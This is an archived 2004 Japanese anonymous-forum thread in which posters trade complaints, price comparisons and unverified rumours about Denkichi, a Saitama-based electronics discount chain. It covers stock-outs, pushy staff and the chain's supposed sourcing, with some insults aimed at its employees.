189 :目のつけ所が名無しさん:04/03/05 21:32
>>188
186の内容が事実だとすれば
186に事実確認をして下さい。

190 :188:04/03/05 21:46
>>189
オレは187の事実を確認したい。
>>186の話は興味がない。

191 :目のつけ所が名無しさん:04/03/06 21:40
>>190
186の内容が問題なのです。

192 :K電気:04/03/08 17:18
でんきちはどんなに馬鹿でも社員になれるらしい、
だからあそこの店員は頭がわるいんだね。
社長しっかりしなきゃつぶれちゃうよ。
せいぜいがんばってね!

193 :目のつけ所が名無しさん:04/03/08 18:03
お客「この品切れてる商品欲しいんですが・・・」
店員「すんません、お取寄せになります」
お客「いつ頃入荷しますか?」
店員「詳しくは判りませんが、1〜2週間ほどです」

ヽ(`Д´)ノ

194 :目のつけ所が名無しさん:04/03/10 17:03
>>192
つぶれそうなのってK電気じゃないか?
でんきちは赤字企業じゃないし。

195 :目のつけ所が名無しさん:04/03/13 09:27
>>193
その通りのような気がします。
本当に商品入ってくるんですかね 代替品を押し付けられるかも、、、、、


196 :目のつけ所が名無しさん:04/03/14 01:56
店員さんがしつこい。入り口までついてこないで。

197 :目のつけ所が名無しさん:04/03/16 12:18
元社員という人の話を聞きましたが
こんな店はとっとと畳んじゃったほうがいいね
すげぇ裏事情で公表出来ませぬが

ここ担当の営業さんは、でんきちを将軍様だと思ってるだろうなw

198 :目のつけ所が名無しさん:04/03/16 14:40
この会社の裏は全く知らないけど、
会社を辞めた人間は、話を100倍くらい膨らましていることが多いよ。

この程度の売上げの企業なら、販社に対しての発言力など全然無いはず。
売上げが大きい所とか、過去の栄光を引きずってるところはやかましいよ。

199 :目のつけ所が名無しさん:04/03/16 15:42
ここには埼玉が本拠地という強みがある
それを武器にガツガツいわしてるんですよ

>>198はでんきち幹部ですか?w

200 :目のつけ所が名無しさん:04/03/16 22:02
>>199
埼玉が本拠地だと、なぜ武器になるの?


201 :目のつけ所が名無しさん:04/03/17 00:30
今月もまた誰か辞めちゃうのかなあ。
もうこれ以上仲間がいなくなるのはイヤだよ。

202 :目のつけ所が名無しさん:04/03/17 01:16
>>200
他に埼玉を本拠地にした量販店がないからです
量販店じゃなくてクレーマー集団って感じですが

203 :目のつけ所が名無しさん:04/03/17 01:40
>>202
もしかして全て埼玉から仕入れてると思ってるのか?

204 : ◆SaiTAMaVxg :04/03/20 11:42
県民だけど都内(清瀬)のでんきちにお世話になってます

205 :目のつけ所が名無しさん:04/04/18 12:05
さいたまと言えば、 まつもとでんき です。

206 :目のつけ所が名無しさん:04/05/01 20:11
>>188
187の件は業界では有名。
だってメーカーからは仕入れてないもん。
調べりゃわかるでしょ。

207 :目のつけ所が名無しさん:04/05/01 22:38
でんちきで何か買おうと思う香具師の気が知れん。邪魔堕の糞客以下。
広告の商品なんか売る気なんか無い。取り寄せる気も全くない。
ただの客寄せで釣れたアポ客に型落ちを売りつける。
そのうちJAROに引っかかるだろ。


208 :目のつけ所が名無しさん:04/05/02 11:15
でんちき社員が必死に書き込んでるのはここでつか?








209 :さいたま市民だが:04/05/02 21:48
確かに広告で他店より安いな!と思った商品は買いに行くと品切れになってる。
デジカメがそうだった。2週間待ちとか・・・。あまり在庫は持たないようだね。
だったら他で買うからいいって言ってノジマに行った。

あそこもデンキチと比較して交渉したら
値引きしてくれた。値段ではでんきちがいちばんらしい。でんきちの名出すとノジマ店員が嫌な顔してたもんな。

値段は安いが在庫少ない&店舗狭い・それでもよければ可でしょう。

最近は俺はコジマ派だけど。意外と値引きしてくれる。ポイントいらないから現金で安いのがいい。


210 :目のつけ所が名無しさん:04/05/04 16:24
>>209
あと商品の出所を気にしないことと
壊れてもサポートはいらないという人(メーカー保証はあるけど)

211 :目のつけ所が名無しさん:04/05/04 18:42
>>210
>あと商品の出所を気にしないこと
どっから仕入れてるんだよ。


212 :目のつけ所が名無しさん:04/05/05 19:10
こういう「匂う」お店があったほうがおもろいやん。 別に悪いことしてるわけないんやろ?
値段高けりゃ、客は買わんし、保証付けといて、修理せんかったらメーカーにクレイムが
行くし。 でも埼玉で5−6店舗だして頑張っるんやから。同県のマツモトさんは
ジャスダック上場にもかかわらす逝ってもーたからなあ。

それより、扱い商品でおもろいもんないんか? 


213 :目のつけ所が名無しさん:04/05/05 19:59

でんきちって、でんきやのきちがい店員が集まって出来たって聞いたけど本当??

214 :目のつけ所が名無しさん:04/05/05 21:35
>>211
商品の出所なんて消費者には関係ないね。 値段と保証してくれればいいんだよ。
まあ、盗品は困るけどなぁ。 どう?安いの? 



215 :目のつけ所が名無しさん:04/05/08 13:29
>>214気乗りしません。

40 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)